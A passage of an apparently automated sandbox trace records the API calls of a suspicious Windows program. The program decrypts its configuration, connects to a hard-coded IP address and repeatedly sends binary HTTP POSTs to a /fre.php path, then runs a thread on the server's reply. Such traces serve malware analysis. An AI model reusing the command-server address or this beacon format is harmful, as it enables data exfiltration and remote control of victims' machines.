StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0332.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.057] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0332.057] GetProcessHeap () returned 0x690000 [0332.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0332.057] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0332.099] GetProcessHeap () returned 0x690000 [0332.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0332.100] GetProcessHeap () returned 0x690000 [0332.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0332.100] GetProcessHeap () returned 0x690000 [0332.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0332.100] GetProcessHeap () returned 0x690000 [0332.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0332.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.101] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0332.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.109] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0332.250] GetProcessHeap () returned 0x690000 [0332.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0332.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.253] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0332.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.254] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0332.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.349] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.349] GetProcessHeap () returned 0x690000 [0332.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0332.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.351] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0332.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.352] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0332.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.353] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0332.353] GetProcessHeap () returned 0x690000 [0332.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0332.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.354] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0332.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.356] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0332.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.357] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0332.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.358] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0332.358] GetProcessHeap () returned 0x690000 [0332.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0332.358] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0332.358] GetProcessHeap () returned 0x690000 [0332.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0332.358] socket (af=2, type=1, protocol=6) returned 0xbb4 [0332.360] connect (s=0xbb4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0332.399] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0332.399] GetProcessHeap () returned 0x690000 [0332.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0332.399] GetProcessHeap () returned 0x690000 [0332.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0332.400] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0332.401] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0332.401] GetProcessHeap () returned 0x690000 [0332.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0332.401] GetProcessHeap () returned 0x690000 [0332.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0332.402] GetProcessHeap () returned 0x690000 [0332.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0332.402] GetProcessHeap () returned 0x690000 [0332.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0332.403] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0332.403] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0332.403] GetProcessHeap () returned 0x690000 [0332.404] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0332.404] GetProcessHeap () returned 0x690000 [0332.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0332.404] send (s=0xbb4, buf=0x6ad508*, len=242, flags=0) returned 242 [0332.405] send (s=0xbb4, buf=0x6aba40*, len=159, flags=0) returned 159 [0332.405] GetProcessHeap () returned 0x690000 [0332.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0332.405] recv (in: s=0xbb4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0332.484] GetProcessHeap () returned 0x690000 [0332.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0332.484] GetProcessHeap () returned 0x690000 [0332.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0332.485] GetProcessHeap () returned 0x690000 [0332.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0332.485] GetProcessHeap () returned 0x690000 [0332.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0332.486] closesocket (s=0xbb4) returned 0 [0332.487] GetProcessHeap () returned 0x690000 [0332.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0332.487] GetProcessHeap () returned 0x690000 [0332.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0332.488] GetProcessHeap () returned 0x690000 [0332.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0332.490] GetProcessHeap () returned 0x690000 [0332.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0332.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1900) returned 0xbb4 [0332.493] Sleep (dwMilliseconds=0xea60) [0332.495] GetProcessHeap () returned 0x690000 [0332.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0332.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.496] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0332.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.536] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0332.776] GetProcessHeap () returned 0x690000 [0332.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0332.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.777] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0332.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.778] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0332.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.779] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.779] GetProcessHeap () returned 0x690000 [0332.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0332.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.784] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0332.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.785] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0332.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.787] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0332.787] GetProcessHeap () returned 0x690000 [0332.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0332.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.789] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0332.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.790] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0332.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.792] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0332.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.793] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0332.793] GetProcessHeap () returned 0x690000 [0332.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0332.793] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0332.793] GetProcessHeap () returned 0x690000 [0332.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0332.794] GetProcessHeap () returned 0x690000 [0332.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0332.794] GetProcessHeap () returned 0x690000 [0332.794] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0332.794] GetProcessHeap () returned 0x690000 [0332.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0332.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0332.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.800] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0332.807] GetProcessHeap () returned 0x690000 [0332.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0332.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.808] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0332.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.809] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0332.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.810] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.810] GetProcessHeap () returned 0x690000 [0332.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0332.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.817] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0332.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.819] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0332.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.820] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0332.820] GetProcessHeap () returned 0x690000 [0332.820] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0332.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.822] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0332.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.824] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0332.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.827] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0332.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.828] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0332.828] GetProcessHeap () returned 0x690000 [0332.828] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0332.828] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0332.828] GetProcessHeap () returned 0x690000 [0332.829] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0332.829] socket (af=2, type=1, protocol=6) returned 0xbb8 [0332.829] connect (s=0xbb8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0332.857] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0332.857] GetProcessHeap () returned 0x690000 [0332.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0332.857] GetProcessHeap () returned 0x690000 [0332.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0332.857] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0332.858] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0332.858] GetProcessHeap () returned 0x690000 [0332.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0332.858] GetProcessHeap () returned 0x690000 [0332.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0332.859] GetProcessHeap () returned 0x690000 [0332.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0332.859] GetProcessHeap () returned 0x690000 [0332.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0332.860] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0332.860] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0332.860] GetProcessHeap () returned 0x690000 [0332.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0332.861] GetProcessHeap () returned 0x690000 [0332.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0332.862] send (s=0xbb8, buf=0x6ad508*, len=242, flags=0) returned 242 [0332.862] send (s=0xbb8, buf=0x6aba40*, len=159, flags=0) returned 159 [0332.863] GetProcessHeap () returned 0x690000 [0332.863] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0332.863] recv (in: s=0xbb8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0332.935] GetProcessHeap () returned 0x690000 [0332.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0332.936] GetProcessHeap () returned 0x690000 [0332.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0332.937] GetProcessHeap () returned 0x690000 [0332.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0332.938] GetProcessHeap () returned 0x690000 [0332.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0332.938] closesocket (s=0xbb8) returned 0 [0332.939] GetProcessHeap () returned 0x690000 [0332.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0332.939] GetProcessHeap () returned 0x690000 [0332.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0332.940] GetProcessHeap () returned 0x690000 [0332.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0332.941] GetProcessHeap () returned 0x690000 [0332.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0332.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1904) returned 0xbb8 [0332.946] Sleep (dwMilliseconds=0xea60) [0332.947] GetProcessHeap () returned 0x690000 [0332.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0332.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.949] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0332.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.955] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0332.963] GetProcessHeap () returned 0x690000 [0332.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0332.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.964] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0332.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.965] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0332.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.966] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.966] GetProcessHeap () returned 0x690000 [0332.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0332.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.967] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0332.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.968] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0332.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0332.969] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0332.969] GetProcessHeap () returned 0x690000 [0332.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0332.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.970] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0332.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.971] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0332.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.972] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0332.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0332.973] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0332.973] GetProcessHeap () returned 0x690000 [0332.973] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0332.973] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0332.973] GetProcessHeap () returned 0x690000 [0332.974] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0332.974] GetProcessHeap () 